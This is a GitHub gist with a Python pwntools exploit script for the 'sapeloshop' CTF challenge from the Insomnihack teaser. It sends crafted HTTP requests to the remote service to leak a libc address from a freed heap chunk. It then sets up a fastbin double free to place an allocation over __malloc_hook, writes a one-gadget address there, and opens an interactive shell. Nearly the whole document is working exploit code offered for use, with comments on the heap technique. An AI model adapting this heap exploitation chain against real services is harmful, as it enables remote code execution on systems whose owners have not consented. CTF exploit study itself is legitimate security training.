Skip to content

Instantly share code, notes, and snippets.

@romanking98
Created January 22, 2018 13:37
Show Gist options
  • Save romanking98/534473437f38d7b8ed93b244275e5047 to your computer and use it in GitHub Desktop.
Save romanking98/534473437f38d7b8ed93b244275e5047 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")
#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
r = remote('sapeloshop.teaser.insomnihack.ch', 80)
#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()
i = int("3d714", 16)
def get(where):
global r
d = "GET %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nConnection: keep-alive\r\n\r\n" % where
r.write(d)
o = r.readuntil('Content-Length: ')
t = r.readline()
o += t
sz = int(t.strip())+1
o += r.recvn(sz)
print "========== GET", where
print o
print "-"*100
return o
def post(where, what):
global r
d = "POST %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: keep-alive\r\n\r\n%s" % (where, len(what), what)
r.write(d)
o = r.readuntil('Content-Length: ')
t = r.readline()
o += t
sz = int(t.strip())+1
o += r.recvn(sz)
print "========== POST %s: %s" % (where, what)
print o
print "-"*100
return o
def post2(where, what):
global r
d = "POST %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: keep-alive\r\n\r\n%s" % (where, len(what), what)
r.write(d)
get("/")
desc1 = "desc="
desc1 += "A"*90
desc2 = "desc="
desc2 += "B"*90
desc3 = "desc="
desc3 += "C"*90
buf1 = "desc="
buf1 += "X"*200
post("/add",buf1)
buf2 = "desc="
buf2 += "Y"*200
post("/add",buf2)
post("/inc","item=0")
post("/sub", "item=0")
post("/sub", "item=0")
post("/inc","item=0")
# Cleanup heap.
leak = post("/del","item=1")
leak = leak.split("><img src=")
for i in range(len(leak)):
if "col-md-8" in leak[i]:
leak = leak[i+1]
leak = leak[5:11] + "\x00"*2
leak = u64(leak) - 0x3c4b78
sol = "desc="
sol += "B"*(0x1b0-5)
post("/add",sol)
post("/add","desc=A")
# Start attack.
post("/add", desc1)
post("/add", desc2)
post("/add", desc3)
post("/inc", "item=2")
post("/sub", "item=2")
post("/sub", "item=2")
post("/inc", "item=2")
post("/del", "item=3")
post("/sub", "item=2")
# Fastbin freelist : A -> B -> A
# Control FD of A in first allocation.
# first allocation -- set FD to __malloc_hook.
# 4th allocation will be near __malloc_hook.
fin1 = "desc="
fin1 += "D"*90
malloc_hook = p64(leak + 0x3c4aed)
print hex(leak)
raw_input()
fin2 = "desc="
fin2 += malloc_hook[0:6]
fin2 += "%00%00" # URL encoding of NULL bytes.
fin2 += "E"*78
fin3 = "desc="
fin3 += "F"*90
fin4 = "desc="
fin4 += "G"*90
fin5 = "desc="
fin5 += "H"*19
system = leak + 0x45216
system = leak + 0xf1147
system = leak + 0xf02a4
fin5 += p64(system)[0:6]
fin5 += "%00%00"
fin5 += "H"*(90-27)
post("/add", fin2)
post("/add", fin3)
post("/add", fin4)
post("/add", fin5)
post2("/add","desc=DASJKDAS")
#post("/sub", "item=0")
#post("/del", "item=1")
#post
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment